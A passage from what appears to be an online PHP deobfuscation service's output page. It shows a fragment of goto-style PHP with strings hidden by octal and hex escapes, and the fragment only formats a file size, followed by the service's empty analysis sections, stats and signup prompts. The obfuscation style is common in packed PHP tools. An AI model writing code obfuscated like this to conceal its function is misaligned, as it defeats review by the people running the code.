($s >= 1024) { return sprintf("\45\x31\x2e\62\146", $s / 1024) . "\40\113\x42"; } else { return $s . "\x20\102"; } } goto etiAC; Zxful: exit;

Function Calls

None

Variables

None

Stats

MD5	1f704ac7b4456fd744e19359a214e242
Eval Count	0
Decode Time	314 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats